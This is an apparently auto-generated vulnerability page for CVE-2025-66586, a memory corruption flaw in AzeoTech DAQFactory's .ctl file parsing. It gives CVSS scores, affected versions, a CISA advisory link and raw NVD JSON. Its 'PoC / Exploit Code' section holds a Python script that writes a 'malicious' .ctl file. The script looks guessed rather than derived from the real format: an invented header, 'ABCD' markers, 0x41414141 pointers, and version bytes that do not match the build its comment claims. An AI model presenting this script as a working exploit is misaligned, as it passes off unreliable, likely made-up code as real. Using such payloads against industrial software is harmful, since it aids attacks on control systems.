Security Vulnerability Report
CVE-2025-66586 CVSS 7.8 HIGH

Published: 2025-12-11 21:15:58
Last Modified: 2026-01-02 20:06:35

Description

In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Resource Using Incompatible Type vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:* - VULNERABLE
AzeoTech DAQFactory < 20.7 Build 2555
AzeoTech DAQFactory 20.7 (Build 2555)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-66586 PoC - AzeoTech DAQFactory .ctl File Memory Corruption
# Generate malicious .ctl file to trigger memory corruption

import struct


def generate_malicious_ctl():
    """Generate a crafted .ctl file that triggers the vulnerability"""
    # DAQFactory .ctl file header
    header = b'DAQFactory Control File\x00'

    # Version marker (targeting version 20.7 Build 2555)
    version = b'\x20\x07\xFF\x9B'  # Version 20.7, Build 2555

    # Malicious payload to trigger type confusion
    # This causes memory corruption when parsed
    type_confusion_marker = b'\x41\x42\x43\x44'  # 'ABCD' - type confusion trigger

    # Heap spray / memory corruption payload
    corruption_data = b'A' * 1024 + b'\x90' * 256

    # Crafted object reference that causes incompatible type access
    object_ref = struct.pack('<I', 0x41414141)  # Invalid pointer

    # Build the malicious .ctl content
    malicious_content = (
        header +
        version +
        type_confusion_marker +
        b'\x00\x01\x00\x00' +  # Object type marker
        object_ref +
        corruption_data +
        b'\x00' * 512  # Padding
    )
    return malicious_content


def main():
    """Generate and save the PoC .ctl file"""
    payload = generate_malicious_ctl()
    output_file = 'CVE-2025-66586_malicious.ctl'
    with open(output_file, 'wb') as f:
        f.write(payload)
    print(f'[+] Generated malicious .ctl file: {output_file}')
    print(f'[+] File size: {len(payload)} bytes')
    print('[!] This PoC triggers memory corruption in DAQFactory 20.7 Build 2555')
    print('[!] When opened, it may allow arbitrary code execution')


if __name__ == '__main__':
    main()
```

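References

https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 (Third Party Advisory, US Government Resource)
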
Raw JSON Data

{"cve": {"id": "CVE-2025-66586", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:57.583", "lastModified": "2026-01-02T20:06:35.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Resource Using Incompatible Type vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.1", "matchCriteriaId": "5376DDEC-0BAA-465A-9EFB-62B3600336E8"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}